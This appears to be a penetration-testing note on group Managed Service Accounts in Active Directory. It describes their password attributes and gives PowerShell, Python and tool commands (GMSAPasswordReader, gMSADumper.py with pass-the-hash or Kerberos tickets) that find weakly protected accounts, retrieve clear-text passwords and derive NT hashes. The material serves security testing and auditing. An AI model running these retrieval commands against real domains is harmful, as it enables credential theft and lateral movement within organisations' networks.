# Exploitation - gMSA accounts (gMSAs)

## Active Directory - group Managed Service Accounts (gMSAs)

#### Overview

Introduced in `Windows Server 2012`, `group Managed Service Accounts (gMSAs)` are service accounts whose password is managed by Active Directory Domain Services. `gMSAs` address a shortcoming of standalone `Managed Service Accounts (MSAs)`, introduced in `Windows Server 2008 R2`, which could only be used on a single computer. `gMSAs` use 240-byte random passwords, generated and periodically rotated (every 30 days by default) by (writable) Domain Controllers from the domain `Key Distribution Service (KDS)` `root key`. The password itself is not stored on the `gMSA` object: a Domain Controller derives it on demand from the `KDS root key` and the account's key identifier, which is why any principal allowed to read it obtains the clear-text password rather than a hash.

`gMSAs` created using the `New-ADServiceAccount` PowerShell cmdlet are by default placed in the default managed service accounts container (`CN=Managed Service Accounts,<DOMAIN_ROOT>`).

`gMSAs` are objects of class `ms-DS-Group-Managed-Service-Account` (`objectClass` `msDS-GroupManagedServiceAccount`, a subclass of `Computer`) with the following additional attributes:

* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`): a security descriptor defining which security principal(s) can retrieve the `gMSA` password (through the `msDS-ManagedPassword` attribute). The principal(s) granted the `RIGHT_DS_READ_PROPERTY` access right in its `DACL` are allowed to retrieve the password. This check is distinct from the ACL of the `gMSA` object itself: a principal able to write `msDS-GroupMSAMembership` can add itself to the security descriptor and then read the password.
* `msDS-ManagedPassword`: a [`MSDS-MANAGEDPASSWORD_BLOB`](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) that contains the `gMSA`'s current and previous clear-text password (as raw `UTF-16LE` bytes), as well as the time remaining before the next password query and the time during which the current password is guaranteed to remain unchanged. `msDS-ManagedPassword` is a constructed attribute: it is computed by a (writable) Domain Controller upon each query from the `KDS root key` and the key identifiers, is only returned to principals allowed by `msDS-GroupMSAMembership`, and is only returned over a sealed (signed and encrypted) or `TLS`-protected (`LDAPS`) connection, so a plain `LDAP` query returns no value.
* `msDS-ManagedPasswordId` and `msDS-ManagedPasswordPreviousId`: contain the `KDS` key identifier (root key `GUID` and key generation) used to compute, respectively, the current and previous password of the `gMSA`.
* `msDS-ManagedPasswordInterval`: contains the interval, in days, at which the `gMSA`'s password is rotated. By default, the rotation period is 30 days. The interval can only be set at creation time (`New-ADServiceAccount -ManagedPasswordIntervalInDays`) and cannot be modified afterwards.
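
The `msDS-GroupMSAMembership` attribute is a raw, self-relative `NT` security descriptor, which is what tools that do not go through the `ActiveDirectory` module (`gMSADumper.py` for instance) have to decode to list the allowed principals. The following Python block is an added example, not code from this page nor from any of the tools referenced here: it builds a constructed security descriptor with `ACCESS_ALLOWED` ACEs, parses it back, and flags ACEs that grant `RIGHT_DS_READ_PROPERTY` to broad principals (`Everyone`, `Authenticated Users`, `Anonymous`, `Domain Users`, `Domain Computers`). The domain SID, the group RID `1105` and the `0xF01FF` mask of the sample are constructed; the function names are the example's own.

```python
import struct

# Right the DC checks in the msDS-GroupMSAMembership DACL before returning
# msDS-ManagedPassword (RIGHT_DS_READ_PROPERTY, value 0x10).
RIGHT_DS_READ_PROPERTY = 0x00000010
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACCESS_ALLOWED_ACE_TYPE, ACCESS_DENIED_ACE_TYPE = 0x00, 0x01
ACCESS_ALLOWED_OBJECT_ACE_TYPE, ACCESS_DENIED_OBJECT_ACE_TYPE = 0x05, 0x06

# Trustees that effectively mean "any domain principal": well-known SIDs
# (Everyone, Authenticated Users, Anonymous) and the Domain Users / Domain Computers RIDs.
BROAD_WELL_KNOWN_SIDS = {"S-1-1-0", "S-1-5-11", "S-1-5-7"}
BROAD_DOMAIN_RIDS = {513, 515}


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-5-21-...' into the binary SID layout: revision, sub-authority count,
    48-bit big-endian identifier authority, then little-endian 32-bit sub-authorities."""
    parts = sid.split("-")
    revision, authority, subs = int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data: bytes, offset: int = 0) -> tuple:
    """Decode a binary SID starting at `offset`; returns (string SID, encoded size in bytes)."""
    revision, count = struct.unpack_from("<BB", data, offset)
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, offset + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_membership_sd(aces) -> bytes:
    """Constructed self-relative security descriptor: no owner / group / SACL, one DACL made of
    (ace_type, trustee SID, access mask) entries. Used here only to have offline test input."""
    ace_blobs = []
    for ace_type, sid, mask in aces:
        sid_bytes = sid_to_bytes(sid)
        ace_blobs.append(struct.pack("<BBHI", ace_type, 0, 8 + len(sid_bytes), mask) + sid_bytes)
    dacl_body = b"".join(ace_blobs)
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(dacl_body), len(ace_blobs), 0) + dacl_body
    # 20-byte header: Revision 1, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl.
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, 0, 0, 0, 20)
    return header + dacl


def parse_membership_sd(sd: bytes) -> list:
    """Walk the DACL of msDS-GroupMSAMembership and report, per ACE, who can read the password."""
    revision, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []  # no DACL at all: nobody is allowed to read the managed password
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    entries, pos = [], dacl_off + 8
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type in (ACCESS_ALLOWED_OBJECT_ACE_TYPE, ACCESS_DENIED_OBJECT_ACE_TYPE):
            # Object ACEs carry Flags plus optional ObjectType / InheritedObjectType GUIDs before the SID.
            obj_flags = struct.unpack_from("<I", sd, pos + 8)[0]
            sid_off = pos + 12 + (16 if obj_flags & 0x1 else 0) + (16 if obj_flags & 0x2 else 0)
        else:
            sid_off = pos + 8
        sid, _ = bytes_to_sid(sd, sid_off)
        rid = int(sid.rsplit("-", 1)[1])
        allowed = (ace_type in (ACCESS_ALLOWED_ACE_TYPE, ACCESS_ALLOWED_OBJECT_ACE_TYPE)
                   and bool(mask & RIGHT_DS_READ_PROPERTY))
        entries.append({
            "sid": sid,
            "mask": mask,
            "can_read_password": allowed,
            "broad_principal": sid in BROAD_WELL_KNOWN_SIDS
            or (sid.startswith("S-1-5-21-") and rid in BROAD_DOMAIN_RIDS),
        })
        pos += ace_size  # AceSize covers header, mask and SID, so unknown ACE types are skipped safely
    return entries


def dangerous_readers(sd: bytes) -> list:
    """SIDs of broad principals that are allowed to read the gMSA password."""
    return [e["sid"] for e in parse_membership_sd(sd) if e["can_read_password"] and e["broad_principal"]]


if __name__ == "__main__":
    # Constructed sample: a dedicated group (RID 1105) with a full mask, plus Authenticated Users.
    sample = build_membership_sd([
        (ACCESS_ALLOWED_ACE_TYPE, "S-1-5-21-1004336348-1177238915-682003330-1105", 0xF01FF),
        (ACCESS_ALLOWED_ACE_TYPE, "S-1-5-11", RIGHT_DS_READ_PROPERTY),
    ])
    for entry in parse_membership_sd(sample):
        print(entry)
    print("broad principals able to read the password:", dangerous_readers(sample))
```

Against a real domain, the input is the raw `msDS-GroupMSAMembership` value returned by an `LDAP` search (the attribute is readable without any special right, unlike `msDS-ManagedPassword`), and the SIDs still have to be resolved and their group membership expanded to decide who can actually use them.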

#### gMSAs enumeration

The PowerShell `ActiveDirectory` module can be used to enumerate the `gMSAs`:

```powershell
# Enumerates the gMSAs in the domain.
Get-ADServiceAccount -Filter *
Get-ADObject -LDAPFilter "(objectClass=msDS-GroupManagedServiceAccount)" -Properties *

# Retrieves the principals allowed to retrieve the gMSAs' password.
Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword

# Retrieves the principals allowed to retrieve the gMSAs' password and highlights potentially interesting
# rights (simple analysis based on direct principal name / SID matching, without resolving group membership).
# From an attacker's perspective:
#   - green: broad principals (any domain user / computer can retrieve the password).
#   - red: already highly privileged principals (retrieving the password brings nothing new).
#   - yellow: other principals, to review manually (nested group membership, already compromised accounts, etc.).
# Well-known principals (Everyone, Authenticated Users, Anonymous) may be returned as SIDs rather than as
# distinguished names, hence the SID patterns.
$PrivilegedPrincipalsRegex = [string]::Join('|', @('CN=Domain Admins', 'CN=Enterprise Admins', 'CN=Domain Controllers', 'CN=Administrators'))
$UnprivilegedPrincipalsRegex = [string]::Join('|', @('CN=Domain Users', 'CN=Domain Computers', 'Everyone', 'Authenticated Users', 'Anonymous', '^S-1-1-0$', '^S-1-5-11$', '^S-1-5-7$'))

Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword | ForEach-Object {
    Write-Host -ForegroundColor DarkGreen -BackgroundColor White $_.SamAccountName
    Write-Host $_.DistinguishedName
    Write-Host $_.SID
    Write-Host "`n"

    Write-Host "PrincipalsAllowedToRetrieveManagedPassword:"
    If (-not $_.PrincipalsAllowedToRetrieveManagedPassword) {
        Write-Host -ForegroundColor Yellow "<none>"
    }
    foreach ($Principal in $_.PrincipalsAllowedToRetrieveManagedPassword) {
        If ($Principal -match $UnprivilegedPrincipalsRegex) {
            Write-Host -ForegroundColor Green $Principal
        }
        ElseIf ($Principal -match $PrivilegedPrincipalsRegex) {
            Write-Host -ForegroundColor Red $Principal
        }
        Else { Write-Host -ForegroundColor Yellow $Principal }
    }

    Write-Host "`n"
}
```

#### gMSAs ACL enumeration and msDS-GroupMSAMembership modification

Refer to the `[ActiveDirectory] ACL exploiting` note (`group Managed Service Accounts (gMSA)` section) for more information on techniques and tools to enumerate the `gMSAs`' ACLs and to modify their `msDS-GroupMSAMembership` attribute.

#### gMSAs password retrieval

Multiple tools and utilities can be used to retrieve a `gMSA` account's password and further derive its `NTLM` / `NTHash` and `Kerberos` secrets (`AES 128` and `AES 256` keys). The retrieval requires the current user (or the specified alternate credentials) to be allowed by the `gMSA`'s `msDS-GroupMSAMembership` attribute, and the query is only answered by writable Domain Controllers over a sealed or `TLS`-protected `LDAP` connection:

| Tool | URL | Description |
| --- | --- | --- |
| <p>PowerShell <code>ActiveDirectory</code> and <a href="https://github.com/MichaelGrafnetter/DSInternals"><code>DSInternals</code></a> modules:<br><br><code>ActiveDirectory</code> module:<br><code>Get-ADServiceAccount</code><br><br><code>DSInternals</code> module:<br><code>ConvertFrom-ADManagedPasswordBlob</code><br><code>ConvertTo-NTHash</code></p> | <https://github.com/MichaelGrafnetter/DSInternals> | <p>Combination of PowerShell cmdlets from the <code>ActiveDirectory</code> and <code>DSInternals</code> modules to retrieve all or the specified <code>gMSAs</code>' password and compute the corresponding <code>NTLM</code> / <code>NTHash</code> and <code>Kerberos</code> secrets.<br><br>Uses the current security context and supports alternate credentials (username/password).</p> |
| [`GMSAPasswordReader`](https://github.com/rvazarkar/GMSAPasswordReader) | <https://github.com/rvazarkar/GMSAPasswordReader> | <p>C# utility that retrieves the specified <code>gMSA</code>'s current and previous password to compute the corresponding <code>NTLM</code> / <code>NTHash</code> and <code>Kerberos</code> secrets.<br><br>Uses the current security context.</p> |
| [`gMSADumper.py`](https://github.com/micahvandeusen/gMSADumper) | <p><https://github.com/micahvandeusen/gMSADumper><br><br>Compiled standalone Linux / Windows x64 binaries:<br><https://github.com/Qazeer/OffensivePythonPipeline></p> | <p>Python script that retrieves the password of all the <code>gMSAs</code> the given user has access to and computes the corresponding <code>NTLM</code> / <code>NTHash</code>.<br><br>Supports user authentication with username/password, username/<code>NTHash</code>, or <code>Kerberos</code> tickets (on Linux using a ticket in the <code>credential cache (ccache)</code> format). Does not leverage the current security context.</p> |

```powershell
# PowerShell ActiveDirectory and DSInternals modules.
# Import-Module "<PATH>\DSInternals.psd1"
# The ActiveDirectory module transparently uses a sealed connection, as required for msDS-ManagedPassword
# to be returned; the query must nevertheless reach a writable Domain Controller.
$gMSA = Get-ADServiceAccount -Identity '<GMSA_NAME>' -Properties 'msDS-ManagedPassword'
$msDSMP_blob = $gMSA.'msDS-ManagedPassword'

# Decodes the MSDS-MANAGEDPASSWORD_BLOB data structure using the DSInternals module.
$CleartextPassword = ConvertFrom-ADManagedPasswordBlob $msDSMP_blob
$CleartextPassword

# Converts the cleartext password to the corresponding NTLM / NT hash using the DSInternals module.
# To compute the corresponding Kerberos secrets using the cleartext password, refer to the "[ActiveDirectory] Kerberos tickets usage" note.
ConvertTo-NTHash -Password $CleartextPassword.SecureCurrentPassword

# GMSAPasswordReader C# utility (current security context).
GMSAPasswordReader.exe --AccountName <GMSA_NAME>
```

```bash
# gMSADumper.py Python script and standalone compiled binaries.
gMSADumper.py -d <DOMAIN> -u <USERNAME> -p <PASSWORD>

# <LM_HASH>:<NT_HASH> if only the NT_HASH is known: 'aad3b435b51404eeaad3b435b51404ee:<NT_HASH>'
gMSADumper.py -d <DOMAIN> -u <USERNAME> -p <LM_HASH>:<NT_HASH>

# On Linux, Kerberos authentication using a Ticket-Granting-Ticket in the ccache format,
# referenced through the KRB5CCNAME environment variable.
export KRB5CCNAME=<TICKET.ccache>
gMSADumper.py -k -d <DOMAIN> -u <USERNAME>
```
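
Both the blob layout described in the overview (`msDS-ManagedPassword`) and the `ConvertFrom-ADManagedPasswordBlob` / `ConvertTo-NTHash` steps above come down to the same two operations: walking the `MSDS-MANAGEDPASSWORD_BLOB` offsets, and running `MD4` over the raw `UTF-16LE` password bytes (the `NT` hash is `MD4(UTF-16LE(password))`, and the blob already holds the password in that encoding, so no string conversion is needed or even safe, the bytes not being valid text). The following Python block is an added example written for this page, not code from `DSInternals`, `GMSAPasswordReader` or `gMSADumper.py`: it builds a constructed blob, parses it back and computes the `NT` hashes with a pure-Python `MD4` (`hashlib`'s `md4` is frequently unavailable under `OpenSSL 3`). The sample password bytes and intervals are constructed; the function names are the example's own.

```python
import struct
from datetime import timedelta

MASK32 = 0xFFFFFFFF
UNITS_100NS_PER_US = 10  # blob intervals are 64-bit counts of 100 ns units


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    rounds = (  # (boolean function, additive constant, message-word order, per-step shifts)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        r = [a, b, c, d]
        for func, const, order, shifts in rounds:
            for i in range(16):
                # Registers rotate each step: (a,b,c,d), (d,a,b,c), (c,d,a,b), (b,c,d,a).
                ai, bi, ci, di = (-i) % 4, (1 - i) % 4, (2 - i) % 4, (3 - i) % 4
                r[ai] = _lrot((r[ai] + func(r[bi], r[ci], r[di]) + words[order[i]] + const) & MASK32,
                              shifts[i % 4])
        a, b, c, d = ((v + w) & MASK32 for v, w in zip((a, b, c, d), r))
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password_utf16le: bytes) -> str:
    """NT hash = MD4 over the UTF-16LE password bytes; a gMSA blob already holds that encoding."""
    return md4(password_utf16le).hex()


def build_managed_password_blob(current: bytes, previous, query_interval_days: float,
                                unchanged_interval_days: float) -> bytes:
    """Constructed MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.20): 16-byte header, NULL-terminated WCHAR
    passwords, alignment padding, then two 64-bit 100 ns intervals. Offline test input only."""
    body = current + b"\x00\x00"
    current_off, previous_off = 16, 0
    if previous is not None:
        previous_off = 16 + len(body)
        body += previous + b"\x00\x00"
    body += b"\x00" * ((-(16 + len(body))) % 8)  # QueryPasswordInterval is 8-byte aligned
    query_off = 16 + len(body)
    to_100ns = lambda days: int(days * 86400) * 10_000_000
    body += struct.pack("<QQ", to_100ns(query_interval_days), to_100ns(unchanged_interval_days))
    header = struct.pack("<HHLHHHH", 1, 0, 16 + len(body), current_off, previous_off, query_off, query_off + 8)
    return header + body


def parse_managed_password_blob(blob: bytes) -> dict:
    """Decode a MSDS-MANAGEDPASSWORD_BLOB as returned in msDS-ManagedPassword."""
    version, _, length, current_off, previous_off, query_off, unchanged_off = struct.unpack_from("<HHLHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version 1 MSDS-MANAGEDPASSWORD_BLOB (or truncated)")

    def wstr(start: int, end: int) -> bytes:
        s = blob[start:end]
        while s.endswith(b"\x00\x00"):  # strip the WCHAR terminator and any alignment padding
            s = s[:-2]
        return s

    current = wstr(current_off, previous_off or query_off)
    previous = wstr(previous_off, query_off) if previous_off else None
    query_100ns = struct.unpack_from("<Q", blob, query_off)[0]
    unchanged_100ns = struct.unpack_from("<Q", blob, unchanged_off)[0]
    return {
        "current_password": current,
        "previous_password": previous,
        "current_nt_hash": nt_hash(current),
        "previous_nt_hash": nt_hash(previous) if previous is not None else None,
        "query_password_interval": timedelta(microseconds=query_100ns // UNITS_100NS_PER_US),
        "unchanged_password_interval": timedelta(microseconds=unchanged_100ns // UNITS_100NS_PER_US),
    }


def sample_blob() -> bytes:
    """Constructed sample: short fake passwords (real ones are far longer random UTF-16LE bytes)."""
    return build_managed_password_blob(bytes(range(0x10, 0x30)), bytes(range(0x40, 0x60)), 29.5, 24.5)


if __name__ == "__main__":
    for key, value in parse_managed_password_blob(sample_blob()).items():
        print("%-28s %s" % (key, value.hex() if isinstance(value, bytes) else value))
```

The previous password is worth keeping: a service that has not yet picked up the rotated password, or a ticket issued under it, still validates against the previous `NT` hash during the overlap window the `UnchangedPasswordInterval` describes.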

***

## References

<https://docs.microsoft.com/en-us/powershell/module/activedirectory/new-adserviceaccount>

<https://www.dsinternals.com/en/retrieving-cleartext-gmsa-passwords-from-active-directory/>

<https://it-central.fr/wp-content/uploads/2017/05/202938243-Comptes-et-groupes-de-services-VSA-MSA-gMSA-tuto-de-A-a-Z.pdf>

<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#readgmsapassword>
